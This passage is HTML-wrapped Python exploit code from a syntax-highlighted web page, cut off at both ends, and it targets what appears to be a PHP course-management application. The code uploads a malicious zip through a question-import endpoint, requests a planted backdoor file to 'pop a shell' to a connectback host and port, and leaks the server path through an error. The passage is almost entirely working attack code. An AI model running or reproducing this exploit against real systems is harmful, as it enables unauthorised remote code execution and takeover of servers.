id=\"crayon-591b7aecb0f95111606370-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">_build_zip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-146\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">multiple_files<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;file&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pwn.zip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;pwn.zip&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;rb&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;application\/zip&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;submit_import&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Install&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-149\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-150\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;http&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8220;http:\/\/127.0.0.1:8080&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-151\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/tests\/question_import.php?_course_id=2&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">files<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">multiple_files<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">allow_redirects<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">False<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">proxies<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-152\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-153\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">302<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-154\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-155\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-156\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-157\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_clean_up<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-158\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">remove<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;pwn.zip&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-159\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-160\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">pop_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-161\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-162\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;pops a shell by making a request to the backdoor code<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-163\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-164\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">_clean_up<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-165\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-166\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/home\/si.phtml&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-167\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-168\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-169\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-170\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">we_can_get_fp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-171\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-172\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;gets the full path<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-173\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;requires some php.ini settings:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-174\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;display_errors = On<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-175\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-176\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">fp<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-177\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/%s\/documentation\/index.php?p[]=&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-178\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;array given in &lt;b&gt;\/(.*)documentation\/index.php&lt;\/b&gt; &#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-179\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-180\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/%s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">match<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-181\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-182\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-183\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-184\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-185\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">validation_of_args_are_good<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-186\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-187\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;validates where the arguments are good or not<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-188\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-189\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">w_lst<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">help_str<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-190\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">help_str<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%s &lt;target&gt; &lt;author user:pass&gt; &lt;connectback host:port&gt;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-191\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-192\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-e\">help_str<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-193\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-194\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-195\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-196\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-197\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-198\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) your connectback host must be in &lt;host:port&gt; format&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-199\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-200\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">elif<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-201\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) your student username and password must be in &lt;user:pass&gt; format&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-202\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-203\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-204\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cb_host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host_port<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-205\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-206\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_pass<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-207\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cb_port<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">isdigit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-208\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) you need a port NUMBER for the command back host&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-209\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-210\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">elif <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">access<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getcwd<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">W_OK<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-211\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) dont have write access in current dir!&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-212\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-213\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0f95111606370-214\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0f95111606370-215\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 